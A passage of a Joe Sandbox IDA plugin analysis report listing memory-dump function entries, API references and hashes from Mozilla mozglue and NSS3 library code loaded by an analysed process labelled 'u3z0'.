                                                                                                                                                                                                                                                                                        • Opcode ID: beb9e600f5da3143b516f863504ff3b5c76931a5eb98e7be77d7695756dbd1ab
                                                                                                                                                                                                                                                                                        • Instruction ID: 2f2e74e7220434e76b3d0cd776068e1e65996e6f0f13ab6b2a38c0070ec0c488
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: beb9e600f5da3143b516f863504ff3b5c76931a5eb98e7be77d7695756dbd1ab
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 621184F1B193809EEB209F69CD06B823BA8E757618F241429E405CBB41E775C6148BEB
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C78E577
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E584
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C78E5DE
                                                                                                                                                                                                                                                                                        • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C78E8A6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                                                                                                                                                                                                                                        • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$[I %d/%d] profiler_start
                                                                                                                                                                                                                                                                                        • API String ID: 1483687287-1611356987
                                                                                                                                                                                                                                                                                        • Opcode ID: fd015b127a6314fe77a7e25d475c4d5eb350be6d717029b1469feddb5da93d9b
                                                                                                                                                                                                                                                                                        • Instruction ID: 13070c1e85dfaf123b12a9dd824c2cedfff2b5e880775997ea92699dfb82b23b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd015b127a6314fe77a7e25d475c4d5eb350be6d717029b1469feddb5da93d9b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B011ED32B0024ADFCB009F15C948A6ABBB8FB89728F400639F86147A50C774AA44CBD2
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C790CD5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE(?,6C755407), ref: 6C77F9A7
                                                                                                                                                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C790D40
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C790DCB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C765EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: memset.VCRUNTIME140(ewzl,000000E5,?), ref: 6C765F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C765E90: LeaveCriticalSection.KERNEL32(?), ref: 6C765FB2
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C790DDD
                                                                                                                                                                                                                                                                                        • free.MOZGLUE ref: 6C790DF2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4069420150-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 409b67564343a759f49d296b5f3757288a3e327bcf45a5d3d4073fa6946b2988
                                                                                                                                                                                                                                                                                        • Instruction ID: de5b14313100e7f9a0ec599ed895281aa45d86eb45484d04cf49958e0720143a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 409b67564343a759f49d296b5f3757288a3e327bcf45a5d3d4073fa6946b2988
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA415B719187848BD720CF29D28579EFBE5BFC9714F108A2EE8D887751D7709844CB82
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79CDA4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C79D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C79CDBA,00100000,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79D158
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C79D130: InitializeConditionVariable.KERNEL32(00000098,?,6C79CDBA,00100000,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79D177
                                                                                                                                                                                                                                                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79CDC4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C797480: ReleaseSRWLockExclusive.KERNEL32(?,6C791385,?,?,?,?,6C791385,?), ref: 6C7974EB
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79CECC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: mozalloc_abort.MOZGLUE(?), ref: 6C75CAA2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C78CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C79CEEA,?,?,?,?,00000000,?,6C78DA31,00100000,?,?,00000000), ref: 6C78CB57
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C78CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C78CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C79CEEA,?,?), ref: 6C78CBAF
                                                                                                                                                                                                                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C78DA31,00100000,?,?,00000000,?), ref: 6C79D058
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 861561044-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a3860d130efe068fc27f9b141e3d6f9975ef66fd4d8e6038c36a1a2441173664
                                                                                                                                                                                                                                                                                        • Instruction ID: 8b8f2fb83b6544802a011e87c68400ba6f9f56559190af38d4fbcb6b53ed9b1b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3860d130efe068fc27f9b141e3d6f9975ef66fd4d8e6038c36a1a2441173664
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03D16D71A04B069FD708CF28D580B99F7E1BF99308F01866DD8598B752EB31A9A5CBC1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTickCount64.KERNEL32 ref: 6C765D40
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C7CF688), ref: 6C765D67
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C765DB4
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C7CF688), ref: 6C765DED
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 557828605-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5cf43fbc30924883be0344df0f2b3b452271f13e2285c85498f47e829731be4c
                                                                                                                                                                                                                                                                                        • Instruction ID: dcbe55ccae321a77812ac6eb3c9b9d2d8f470011705fe640ef79fd9722c7008b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cf43fbc30924883be0344df0f2b3b452271f13e2285c85498f47e829731be4c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54516171E0011A8FDF08CF69C995ABEBBB1FB85304F19862DD855B7B91C7306A45CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C74CEBD
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C74CEF5
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C74CF4E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 438689982-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 6aaa86780b46f336ac65b1c9f00c5e3a62837c84b91b8e35e174f096710908ec
                                                                                                                                                                                                                                                                                        • Instruction ID: 16bdd90ed860428573128a8f95dcde8013c640ad3afdc97b1f8abe155211bf16
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6aaa86780b46f336ac65b1c9f00c5e3a62837c84b91b8e35e174f096710908ec
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B510376A0025A8FCB00CF19C890A9ABBB5EF99300F19C59DD8595F351D731ED0ACBE0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C866C8D
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C866CA9
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C866CC0
                                                                                                                                                                                                                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C988FE0), ref: 6C866CFE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2370200771-0
                                                                                                                                                                                                                                                                                        • Opcode ID: baca789b992b6601b7f31c3231ec878dbb7590436a8535fa30d94907d94f400e
                                                                                                                                                                                                                                                                                        • Instruction ID: 911cadb928ea01e47207780611894c69c5949e07619339aa95e3da5e5de4f29e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baca789b992b6601b7f31c3231ec878dbb7590436a8535fa30d94907d94f400e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B331A3B5A002169FEB14CF65C991ABFBBF5EF85248B10483DD905E7B40EB31D905CBA0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000200), ref: 6C78649B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000200), ref: 6C7864A9
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77FA80: GetCurrentThreadId.KERNEL32 ref: 6C77FA8D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77FA80: AcquireSRWLockExclusive.KERNEL32(6C7CF448,?,6C77FA1F,?,?,6C755407), ref: 6C77FA99
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32 ref: 6C78653F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C78655A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3596744550-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 71048e7f4e2baadc5e539d779fd705371e7ecece738cff9579a2d517f11b5941
                                                                                                                                                                                                                                                                                        • Instruction ID: 27c94f43a922b6974cce9e60207a3d89b86450f91f33a06fe65cab041fb6b345
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71048e7f4e2baadc5e539d779fd705371e7ecece738cff9579a2d517f11b5941
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 453172B5A05305AFDB00DF14D98869EBBE4FF89314F10843DE95A97741DB30EA19CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CERT_NewCertList.NSS3 ref: 6C88ACC2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C862F0A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C862F1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C860A1B,00000000), ref: 6C862AF0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C862B11
                                                                                                                                                                                                                                                                                        • CERT_DestroyCertList.NSS3(00000000), ref: 6C88AD5E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C86B41E,00000000,00000000,?,00000000,?,6C86B41E,00000000,00000000,00000001,?), ref: 6C8A57E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C8A5843
                                                                                                                                                                                                                                                                                        • CERT_DestroyCertList.NSS3(?), ref: 6C88AD36
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862F50: CERT_DestroyCertificate.NSS3(?), ref: 6C862F65
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C862F83
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C88AD4F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 132756963-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6daded8f3c2ed01bf85ae374600e3da1acde64e848c2cb2830e06b66b8d3ba03
                                                                                                                                                                                                                                                                                        • Instruction ID: 21352aeaa1d4b865f03888621def78f859a076ca11f458657cc2fae278bacf3b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6daded8f3c2ed01bf85ae374600e3da1acde64e848c2cb2830e06b66b8d3ba03
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8821F6B1D012049BEF20DF68DA055EEB7B4EF05209F154478D805BBB80FB35AA49CBE1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C8BF0AD,6C8BF150,?,6C8BF150,?,?,?), ref: 6C8BECBA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8687ED,00000800,6C85EF74,00000000), ref: 6C8C1000
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0FF0: PR_NewLock.NSS3(?,00000800,6C85EF74,00000000), ref: 6C8C1016
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8687ED,00000008,?,00000800,6C85EF74,00000000), ref: 6C8C102B
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C8BECD1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C10F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: EnterCriticalSection.KERNEL32(?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C110C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PL_ArenaAllocate.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1141
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PR_Unlock.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1182
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C119C
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C8BED02
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PL_ArenaAllocate.NSS3(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C116E
                                                                                                                                                                                                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C8BED5A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2957673229-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C75B4F5
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C75B502
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C75B542
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C75B578
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2047719359-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C8F5F17,?,?,?,?,?,?,?,?,6C8FAAD4), ref: 6C90AC94
                                                                                                                                                                                                                                                                                        • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C8F5F17,?,?,?,?,?,?,?,?,6C8FAAD4), ref: 6C90ACA6
